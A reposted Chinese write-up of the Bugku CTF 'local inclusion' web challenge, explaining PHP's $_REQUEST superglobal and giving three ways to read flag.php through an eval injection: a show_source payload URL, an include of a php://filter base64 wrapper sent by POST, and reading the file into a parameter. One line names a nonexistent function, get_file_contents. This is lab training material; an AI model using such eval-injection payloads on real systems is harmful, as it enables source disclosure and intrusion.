码上快乐

相关内容   简体   繁体

BugkuWeb本地包含

本文转载自  查看原文  2019-03-19 21:36  1162    CTF学习

知识点:$_REQUEST不是一个函数,它是一个超全局变量,里面包括有$_GET $_POST $_COOKIE的值,$_REPUEST 是接收了 $_GET $_POST $_COOKIE 三个的集合

 

题目中的 地址已经不行了

所以这是转自https://blog.csdn.net/dyw_666666/article/details/82389457#comments,感谢分享

 



 

 

方法一:eval存在命令执行漏洞,使用hello构造payload

http://120.24.86.145:8003/index.php?hello=1);show_source(%27flag.php%27);var_dump(3

 

 

方法二:

1.http://120.24.86.145:8003/index.php?hello=1);include $_POST['f'];//
2.在POST区域:f=php://filter/convert.base64-encode/resource=flag.php

 

Base64解码即可。

 

 

方法三:直接将flag.php文件读入变量hello中

1.?hello=get_file_contents('flag.php')
2.?hello=file('flag.php')



 



 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 bugku_本地包含 文件包含——本地文件包含和远程文件包含 phpMyAdmin本地文件包含漏洞 php本地文件包含 Writeup 9.本地包含(这题可能出现了问题) Bugku-CTF之本地包含( 60) 本地文件包含漏洞利用姿势 maven打包时包含本地jar 本地文件包含漏洞(LFI漏洞) 渗透测试之本地文件包含(LFI)
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM